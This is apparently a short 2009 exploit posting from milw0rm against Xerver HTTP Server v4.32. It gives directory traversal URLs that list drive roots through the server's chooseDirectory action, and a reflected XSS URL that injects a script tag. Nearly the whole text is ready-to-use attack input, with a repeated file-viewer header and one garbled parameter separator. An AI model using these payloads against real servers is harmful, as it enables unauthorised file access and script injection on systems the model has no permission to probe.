21 lines
No EOL
384 B
Text
21 lines
No EOL
384 B
Text
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability
|
|
|
|
|
|
By Stack
|
|
|
|
|
|
Directory Traversal Exploit :
|
|
|
|
http://127.0.0.1:32123/action=chooseDirectory¤tPath=d:%5C
|
|
|
|
http://127.0.0.1:32123/action=chooseDirectory¤tPath=c:\
|
|
|
|
|
|
|
|
|
|
XSS Exploit :
|
|
|
|
|
|
http://127.0.0.1:32123/action=chooseDirectory¤tPath='">><script>alert('XSS By Stack')</script>
|
|
|
|
# milw0rm.com [2009-09-18] |